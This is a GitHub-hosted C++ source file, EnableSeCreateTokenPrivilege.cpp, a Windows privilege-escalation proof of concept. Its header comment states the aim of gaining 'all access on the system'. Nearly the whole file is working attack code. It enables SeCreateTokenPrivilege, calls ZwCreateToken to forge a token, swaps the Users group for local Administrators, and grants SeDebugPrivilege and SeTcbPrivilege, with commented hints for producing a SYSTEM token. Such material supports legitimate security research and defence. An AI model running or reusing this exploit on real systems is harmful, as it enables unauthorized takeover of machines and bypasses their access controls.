-
Notifications
You must be signed in to change notification settings - Fork 121
/
EnableSeCreateTokenPrivilege.cpp
341 lines (291 loc) · 9.43 KB
/
EnableSeCreateTokenPrivilege.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
/*
Reference:https://github.com/hatRiot/token-priv
Enable the SeCreateTokenPrivilege of current process and then create primary tokens via the ZwCreateToken API.
After that enable the local administrator group on the token and enable SeDebugPrivilege and SeTcbPrivilege.
We will have all access on the system.
*/
#include <windows.h>
#include <assert.h>
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#define STATUS_SUCCESS 0
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _SID_BUILTIN
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[2];
} SID_BUILTIN, *PSID_BUILTIN;
typedef struct _SID_INTEGRITY
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[1];
} SID_INTEGRITY, *PSID_INTEGRITY;
typedef NTSYSAPI
NTSTATUS
(NTAPI *_ZwCreateToken)(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN TOKEN_TYPE Type,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl,
IN PTOKEN_SOURCE Source
);
PVOID
GetInfoFromToken(HANDLE current_token, TOKEN_INFORMATION_CLASS tic)
{
DWORD n;
PVOID data;
if (!GetTokenInformation(current_token, tic, 0, 0, &n) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
return 0;
data = (PVOID)malloc(n);
if (GetTokenInformation(current_token, tic, data, n, &n))
return data;
else
free(data);
return 0;
}
void get_system_privileges(PTOKEN_PRIVILEGES);
// Given a base, presumably non-priv'd token, generate a new one with the admin group added to it.
// This can very easily be adopted to generate a SYSTEM token instead (see commented out code).
HANDLE
se_create_token_privilege(HANDLE base_token, BOOL isPrimary)
{
LUID luid;
PLUID pluidAuth;
NTSTATUS ntStatus;
LARGE_INTEGER li;
PLARGE_INTEGER pli;
DWORD sessionId;
_TOKEN_TYPE token_type = isPrimary ? TokenPrimary : TokenImpersonation;
HANDLE elevated_token;
PTOKEN_STATISTICS stats;
PTOKEN_PRIVILEGES privileges;
PTOKEN_OWNER owner;
PTOKEN_PRIMARY_GROUP primary_group;
PTOKEN_DEFAULT_DACL default_dacl;
PTOKEN_GROUPS groups;
SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos };
SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY;
PSID_AND_ATTRIBUTES pSid;
PISID pSidSingle;
TOKEN_USER userToken;
TOKEN_SOURCE sourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' },{ 0, 0 } };
PSID lpSidOwner = NULL;
LUID authid = SYSTEM_LUID;
_ZwCreateToken ZwCreateToken;
SID_BUILTIN TkSidLocalAdminGroup = { 1, 2,{ 0, 0, 0, 0, 0, 5 },{ 32, DOMAIN_ALIAS_RID_ADMINS } };
SID_INTEGRITY IntegritySIDHigh = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_HIGH_RID };
SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID };
SID_INTEGRITY IntegritySIDMedium = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_MEDIUM_RID };
ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll"), "ZwCreateToken");
if (ZwCreateToken == NULL) {
printf("[-] Failed to load ZwCreateToken: %d\n", GetLastError());
return NULL;
}
DWORD dwBufferSize = 0;
PTOKEN_USER user;
user = (PTOKEN_USER)GetInfoFromToken(base_token, TokenUser);
AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID,
0, 0, 0, 0, 0, 0, 0, &lpSidOwner);
userToken.User.Sid = lpSidOwner;
userToken.User.Attributes = 0;
AllocateLocallyUniqueId(&luid);
sourceToken.SourceIdentifier.LowPart = luid.LowPart;
sourceToken.SourceIdentifier.HighPart = luid.HighPart;
stats = (PTOKEN_STATISTICS)GetInfoFromToken(base_token, TokenStatistics);
privileges = (PTOKEN_PRIVILEGES)LocalAlloc(LMEM_FIXED, sizeof(TOKEN_PRIVILEGES) + (sizeof(LUID_AND_ATTRIBUTES) * 2));
get_system_privileges(privileges);
groups = (PTOKEN_GROUPS)GetInfoFromToken(base_token, TokenGroups);
primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(base_token, TokenPrimaryGroup);
default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(base_token, TokenDefaultDacl);
pSid = groups->Groups;
for (int i = 0; i < groups->GroupCount; ++i, pSid++)
{
// change IL
if (pSid->Attributes & SE_GROUP_INTEGRITY)
memcpy(pSid->Sid, &IntegritySIDMedium, sizeof(IntegritySIDMedium));
//memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem));
PISID piSid = (PISID)pSid->Sid;
if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS) {
// found RID_USERS membership, overwrite with RID_ADMINS
memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup));
pSid->Attributes = SE_GROUP_ENABLED;
}
else {
pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
pSid->Attributes &= ~SE_GROUP_ENABLED;
}
}
owner = (PTOKEN_OWNER)LocalAlloc(LPTR, sizeof(PSID));
owner->Owner = user->User.Sid;
//owner->Owner = GetLocalSystemSID();
pluidAuth = &authid;
li.LowPart = 0xFFFFFFFF;
li.HighPart = 0xFFFFFFFF;
pli = &li;
ntStatus = ZwCreateToken(&elevated_token,
TOKEN_ALL_ACCESS,
&oa,
token_type,
pluidAuth,
pli,
user,
//&userToken,
groups,
privileges,
owner,
primary_group,
default_dacl,
&sourceToken // creates an anonymous impersonation token
);
if (ntStatus == STATUS_SUCCESS)
return elevated_token;
else
printf("[-] Failed to create new token: %d %08x\n", GetLastError(), ntStatus);
FreeSid(lpSidOwner);
if (stats) LocalFree(stats);
if (groups) LocalFree(groups);
if (privileges) LocalFree(privileges);
return NULL;
}
void
get_system_privileges(PTOKEN_PRIVILEGES privileges)
{
//TOKEN_PRIVILEGES privileges;
LUID luid;
privileges->PrivilegeCount = 2;
// enable DEBUG
printf("Finding SeDebugPrivilege name...\n");
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[0].Luid = luid;
// enable Tcb
printf("Finding SeTcbPrivilege name...\n");
LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid);
privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[1].Luid = luid;
}
int IsTokenSystem(HANDLE tok)
{
DWORD Size, UserSize, DomainSize;
SID *sid;
SID_NAME_USE SidType;
TCHAR UserName[64], DomainName[64];
TOKEN_USER *User;
Size = 0;
GetTokenInformation(tok, TokenUser, NULL, 0, &Size);
if (!Size)
return 0;
User = (TOKEN_USER *)malloc(Size);
assert(User);
GetTokenInformation(tok, TokenUser, User, Size, &Size);
assert(Size);
Size = GetLengthSid(User->User.Sid);
assert(Size);
sid = (SID *)malloc(Size);
assert(sid);
CopySid(Size, sid, User->User.Sid);
UserSize = (sizeof UserName / sizeof *UserName) - 1;
DomainSize = (sizeof DomainName / sizeof *DomainName) - 1;
LookupAccountSid(NULL, sid, UserName, &UserSize, DomainName, &DomainSize, &SidType);
free(sid);
printf("whoami:\n%S\\%S\n", DomainName, UserName);
if (!_wcsicmp(UserName, L"SYSTEM"))
return 0;
return 1;
}
VOID RetPrivDwordAttributesToStr(DWORD attributes, LPTSTR szAttrbutes)
{
UINT len = 0;
if (attributes & SE_PRIVILEGE_ENABLED)
len += wsprintf(szAttrbutes, TEXT("Enabled"));
if (attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
len += wsprintf(szAttrbutes, TEXT("Enabled by default"));
if (attributes & SE_PRIVILEGE_REMOVED)
len += wsprintf(szAttrbutes, TEXT("Removed"));
if (attributes & SE_PRIVILEGE_USED_FOR_ACCESS)
len += wsprintf(szAttrbutes, TEXT("Used for access"));
if (szAttrbutes[0] == 0)
wsprintf(szAttrbutes, TEXT("Disabled"));
return;
}
int GetTokenPrivilege(HANDLE tok)
{
PTOKEN_PRIVILEGES ppriv = NULL;
DWORD dwRet = 0;
GetTokenInformation(tok, TokenGroups, ppriv, dwRet, &dwRet);
if (!dwRet)
return 0;
ppriv = (PTOKEN_PRIVILEGES)calloc(dwRet, 1);
GetTokenInformation(tok, TokenPrivileges, ppriv, dwRet, &dwRet);
printf("\nwhoami /priv\n");
for (int i = 0; i < ppriv->PrivilegeCount; i++)
{
TCHAR lpszPriv[MAX_PATH] = { 0 };
DWORD dwRet = MAX_PATH;
BOOL n = LookupPrivilegeName(NULL, &(ppriv->Privileges[i].Luid), lpszPriv, &dwRet);
printf("%-50ws", lpszPriv);
TCHAR lpszAttrbutes[1024] = { 0 };
RetPrivDwordAttributesToStr(ppriv->Privileges[i].Attributes, lpszAttrbutes);
printf("%ws\n", lpszAttrbutes);
}
return 1;
}
BOOL EnablePriv(HANDLE hToken, LPCTSTR priv)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, priv, &luid))
{
printf("[!]LookupPrivilegeValue error\n");
return 0;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("[!]AdjustTokenPrivileges error\n");
return 0;
}
IsTokenSystem(hToken);
GetTokenPrivilege(hToken);
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
printf("[!]OpenProcessToken error\n");
return 0;
}
EnablePriv(hToken, SE_CREATE_TOKEN_NAME);
se_create_token_privilege(hToken, 0);
return 0;
}